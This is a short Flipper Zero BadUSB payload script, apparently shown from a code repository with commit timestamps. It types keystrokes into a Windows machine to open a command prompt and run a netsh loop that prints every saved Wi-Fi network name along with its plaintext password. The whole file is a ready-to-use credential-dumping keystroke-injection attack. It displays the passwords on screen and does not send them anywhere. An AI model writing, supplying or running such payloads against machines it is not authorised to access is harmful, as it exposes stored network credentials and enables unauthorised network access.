Flipper/BadUSB/Show_WiFi_Passwords.txt

19 lines
388 B
Plaintext
Raw Normal View History

2022-09-18 04:46:30 +00:00
REM
REM Displays saved wireless passwords on screen
REM Author: UberGuidoZ
REM
2022-07-10 07:28:53 +00:00
DELAY 2000
GUI r
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 2000
STRING cls
DELAY 250
ENTER
DELAY 250
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
DELAY 250
ENTER